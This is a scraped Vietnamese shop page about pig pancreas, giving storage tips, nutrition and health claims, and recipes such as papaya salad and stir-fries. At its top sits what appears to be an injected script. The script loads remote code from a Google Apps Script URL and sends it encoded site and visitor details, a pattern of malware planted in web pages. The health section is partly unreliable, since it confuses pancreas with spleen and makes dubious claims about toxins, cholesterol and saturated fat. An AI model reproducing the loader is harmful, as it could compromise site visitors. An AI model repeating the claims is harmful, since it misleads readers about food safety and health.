var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

LÁ MÍA HEO – KG – Thực phẩm hà hiền

LÁ MÍA HEO

Lá mía hay tụy heo, là phần dài nhất của tuyến tụy nằm dài phía sau dạ dày, đuôi của tuyến tụy nằm liền kề với lá lách.

Bảo quản: lá mía rửa sạch, để ráo. Cho vào hộp kín bảo quản ở nhiệt độ 0-4 độ C

Món ăn gợi ý: gỏi đu đủ lá mía heo- Nguyên liệu: 500g lá mía heo, 8 muỗng canh đường, 1 muỗng cafe ngũ vị hương, 2 muỗng canh rượu, 1 muỗng canh dầu ăn, ít khô bò, đu đủ xanh bào nhỏ, rau răm và lá quế cắt nhỏ, đậu phộng rang, nước tương, dấm gạo, tỏi băm.- Cách thực hiện:Bước 1: Lạng bỏ phần mỡ trắng ở giữa lá mía, rửa sạch ngâm qua sữa tươi 15- 20 phút trong tủ lạnh để loại bỏ độc tố. Vớt ra để ráo.Bước 2: Ướp lá mía với 1/2 lượng nước tương + đường + ngũ vị hương + dầu ăn khoảng 1 tiếng trở lên.Bước 3: Cho rượu vào lá mía trộn đều và xếp lá mía vào khay và nướng. Khi lá mía chín, đợi nguội rồi thì thái miếng vừa ăn.Bước 4: Cho tất cả lá mía vừa cắt vào nồi cùng với 1/2 lượng nước tương + đường + ngũ vị hương còn lại vào chảo và khìa cho đến khi lá mía khô.Bước 5: Phần nước giấm pha theo tỉ lệ: 250 ml giấm gạo + 4 muỗng canh đường, quậy tan cùng với tỏi băm.Cho đu đủ bào ra dĩa ít rau răm lá quế lên trên cùng với lá mía , khô bò, đậu phộng rang. Khi ăn chan nước dấm vào , và xịt trực tiếp nước tương vào dĩa gỏi, với liều lượng mặn nhạt theo khẩu vị từng người, và cuối cùng là tương ớt.

lá mía chứa rất nhiều vitamin C, vitamin B2, B3, B5 và B12. Chúng đều có công dụng bổ máu và giúp hệ thần kinh hoạt động hiệu quả. Ngoài ra, trong lá lách có chứa rất nhiều kẽm và selen cần thiết cho chức năng nội tiết và tăng khả năng miễn dịch của cơ thể. Lá lách cũng có các chất chống oxy hóa và giúp tăng cường khả năng tiêu hóa. Vì vậy lá lách lợn là tuy là 1 bộ phận nội tạng nhưng lại được rất nhiều người ưa chuộng. Không chỉ có tác dụng bổ sung chất dinh dưỡng, lá lách lợn khi được tẩm ướp và chế biến cùng các nguyên liệu khác sẽ cho ra đời các món ăn rất ngon .

1.1 Chứa nhiều cholesterol

Nội tạng động vật nói chung đều rất giàu cholesterol. Chẳng hạn, 100g óc bò chứa lượng cholesterol cao hơn mức khuyến cáo cho mỗi ngày là 1,033%. Đặc biệt là thận và gan bò thì còn có lượng cholesterol cao hơn tận 239% và 127%. Song, ta đều biết rằng cholesterol cao chính là nguyên nhân dẫn đến các bệnh bị tắc động mạch, bệnh tim và mỡ trong máu. Gan chính là nơi sản sinh ra cholesterol. Một khi bạn ăn thực phẩm giàu cholesterol, lúc này gan tự động sẽ tiết ra ít hơn. Vậy nên, khi bạn tiêu thụ các thực phẩm chứa nhiều cholesterol sẽ chỉ ảnh hưởng rất nhỏ đến tổng lượng cholesterol trong máu.

1.2 Hàm lượng chất béo bão hòa cao

Lá mía lợn cũng có chứa các chất béo bão hòa giúp bạn hạn chế cảm giác thèm ăn. Theo Hiệp Hội Tim mạch Mỹ, lượng chất béo bão hòa mà bạn cần hấp thụ không nên vượt quá 5-6% nhu cầu calo một ngày của con người

1.3 Chất lượng nội tạng động vật

Các loại động vật thường xuyên tiếp xúc với độc tố và thuốc trừ sâu thì nội tạng của chúng sẽ có độc tính cao hơn. Song gan và thận sẽ giúp lọc các độc tố trong cơ thể, nên chúng sẽ thải ra độc tố chứ không lưu giữ trong gan và thận. Ngoài ra, chất lượng nội tạng cũng có liên quan đến tình trạng tinh thần của các loài động vật. Nếu chúng bị ngược đãi và phải sống trong môi trường không lành mạnh, nội tạng của chúng cũng sẽ không được tươi tốt. Công đoạn sơ chế cũng tiềm nẩ nhiều rủi ro vệ sinh nữa đấy. Bạn nhớ phải sơ chế nội tạng động vật thật kỹ và dùng nguồn nước sạch để đảm bảo an toàn thực phẩm nhé!

1.4 Những đối tượng nên hạn chế ăn nội tạng động vật

Ăn lá mía lợn có tốt không còn tùy vào đối tượng là ai nữa đấy nhé! Không phải cũng đủ khỏe mạnh để hấp thu nội tạng dễ dàng được. Vậy nên nếu bạn là 1 trong 3 trường hợp sau đây thì hãy hạn chế ăn lá lách lợn nhé!

  • Những người bị bệnh gút và mắc các bệnh về tim mạch

  • Phụ nữ mang thai

  • Những người có hệ tiêu hóa kém

II. Các món ngon từ lá mía lợn

2.1. Lá mía xào đậu đũa

Một món ăn dễ làm dễ trúng thưởng và thích hợp ăn cùng cơm nóng. Chỉ cần chuẩn bị các nguyên liệu như lá lách lợn, đậu đũa, rau thơm, hành ngò và gia vị. Sau đó, rửa sạch lá lách với muối, thái thành những lát mỏng vừa ăn. Đậu đũa thì tước vỏ và ngắt thành những khúc ngắn tùy thích. Hành ngò, rau thơm chỉ cần nhặt và rửa sạch, thái nhỏ dể sẵn đó. Bắt chảo với lượng dầu ăn vừa phải, phi tỏi băm cho thơm khoảng 1 phút. Sơ chế xong sẽ bắt đầu bỏ tất cả nguyên liệu vào chảo và đảo đều. Nêm nếm gia vị vừa ăn và ta da, lá mía xào đậu đũa thơm lừng đã xong.

2.2. Lá mía nấu cà rốt

Nguyên liệu cũng rất đơn giản, gồm: lá mía lợn, cà rốt, hành lá, dầu hào và các gia vị. Lá lách cũng rửa sạch với nước và muối để khử mùi tanh. Sau đó thái thành các miếng vuông vừa ăn, cho vào tô để ướp cùng muối, nước mắm, hạt nêm, đường, tiêu và dầu hào trong khoảng 15 phút. Cà rốt thái hình dáng tùy thích sau đó bỏ vào nồi, cho tí nước và bắt đầu nấu cùng với lá mía lợn. Nêm nếm gia vị cho vừa ăn và thêm bún tùy thích nhé!

2.3. Canh lá mía lợn.

Chuẩn bị: râu bắp non, hoài sơn, lá lách lợn, chân giò lợn và các gia vị. Râu bắp rửa sạch rồi để ráo nước. Lá mía lợn cũng rửa sạch với muối và chần sôi qua 1 lần nước. Chân giò lợn thái cỡ vừa ăn. Sau khi sơ chế xong, cho các râu bắp, hoài sơn, lá lách và chân giò lợn vào nồi. Đổ thêm nước và chưng cách thủy đến khi tất cả chín mềm. Nêm nếm gia vị hạt nêm, bột ngọt cho vừa ăn là có thể dùng được. Đặc biệt đây là 1 món ăn rất rất bổ dưỡng cho cơ thể luôn đấy.

2.4. Lá mía xào khế chua.

Một món ăn khá lạ nhưng cũng rất lạ miệng. Chuẩn bị lá mía lợn, khế chua, hành tây, rau răm, hành lá, gừng, rượu trắng, dầu hào và các loại gia vị nêm nếm. Làm sạch lá mía, chần qua nước sôi, thái lát vừa ăn, tẩm ướp cùng hạt nêm và mắm muối khoảng 15 phút. Bắt chảo và phi hành cho thơm, cho hành tây vào xào khoảng 1 phút thì cho tiếp khế chua vào xào cùng. Sau đó mới cho lá mía thái lát vào, nhớ là nhanh tay lửa lớn để lá mía không bị dai. Nêm nếm các gia vị dầu hào, hành lá, rau răm cho vừa miệng. Có thể dùng ăn không hoặc ăn với cơm nóng đều rất ngon và bổ dưỡng.